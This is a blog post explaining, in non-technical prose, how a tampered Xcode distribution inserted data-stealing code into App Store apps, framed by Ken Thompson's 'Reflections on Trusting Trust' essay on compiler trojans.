Apple App Store Hack – Reflections on Trusting Trust

iPhone with Apps
Share Button

Apple’s app review process is excellent at preventing malware from infiltrating their store, but last week proved even the best security practices can be overcome by inventive fraudsters.

First, security researcher Mark Dowd, from Azimuth Security, revealed a security hole in the AirDrop filesharing service that could enable malicious software to load onto an iPhone. Next, there were reports that Chinese apps hosted on the official Apple App Store contained malicious code that could steal information from iPhone users.

According to Palo Alto Networks, this latter incident affects 39 known applications and hundreds of millions of users. The malicious code collects and uploads device and app data to a C2 server using HTTP. The domain names of the C2 servers are connected to an iOS trojan KeyRaider that was recently found to target jailbroken devices. Further analysis of this malware reveals that the code is also capable of receiving commands from the attacking C2, to deploy more complex mechanisms of collecting user credentials.

So the question is, how has this nasty attack managed to bypass Apple’s strong app review process?

In 1984, during his acceptance speech for the ACM Turing Award, the Nobel Prize of computer science, titled Reflections on Trusting Trust, Ken Thompson presented The Ken Thompson Hack. In this short document, Ken Thompson talks about the ease of modifying a compiler to accept new escape sequences or even to introduce a trojan horse. He concludes with a reflection about something that is still relevant in security after 30 years. Trust.

The Ken Thompson Hack may be the first documented reference to compiler malware, which is the same mechanism attackers are now using to sneak malicious code into the Apple App Store.

Since it’s a challenge to get malware past Apple’s app store review team, hackers took a different approach. They embedded malicious code into one of the most used and trusted apps for developers, XCode, Apple’s integrated development environment (IDE) for creating iOS and Mac OS X apps.

Every application links to a set of libraries that allow the app to interact with the underlying operating system. This is true for any platform, regardless of the language or framework you are using. Usually these libraries ship with the software development kit (SDK) or IDE, and developers trust them to build their apps. Security conscious developers only download SDKs or IDEs from legitimate manufacturer websites, but Internet limitations in China force developers to download larger packages from local file sharing services.

In this case, criminals took several legitimate versions of XCode, replaced parts of core libraries with rogue versions, and shared the allegedly legitimate versions in popular Chinese development forums.

The trick is replacing or adding Mach-O object files that the LLVM linker uses when building an iOS app. An object file contains machine object code, in relocatable format, that is not executable until linked into a full featured executable. These files are used by the linker without further verification, other than cohering to the correct format. If attackers manage to replace these files, they can add malicious code without altering the usual behavior of legitimate apps and the malware will go unnoticed in the review process.

Although iOS and Mac sandboxes prevent the altered code from causing major damage to the phone, the infected apps can still read contact information, get location data, access the camera, or any other permissions that are granted to a legitimate app. If you consider the trend of simple apps requiring more permissions, you get some idea of the scope of this attack. Tencent’s hugely popular WeChat app, for example, was one of the infected apps.

You can blame human foolishness (as some have already done), but the truth is that security is always about us, and human-originated flaws will remain a security problem. How many of us have downloaded productivity add-ons for our IDE, browser, or office suite without taking into account all of the expected verifications?

These kinds of attacks pose a larger threat, as they are capable of bypassing protection based on code signing. If an attacker manages to infiltrate a legitimate developer’s toolkit, the code will be legitimately signed by that developer, despite the fact that it carries malware.

Time will tell how manufacturers react to this latest attack. Some will probably demand new verification rules for each object module used by linkers, but even if that happens it will only be a matter of time before these too are compromised. In the end everything will remain subject to trust.

Citing Ken Thompson: “The moral is obvious. You can’t trust code that you did not totally create yourself. (Especially code from companies that employ people like me.)”

Leave a Reply

Your email address will not be published. Required fields are marked *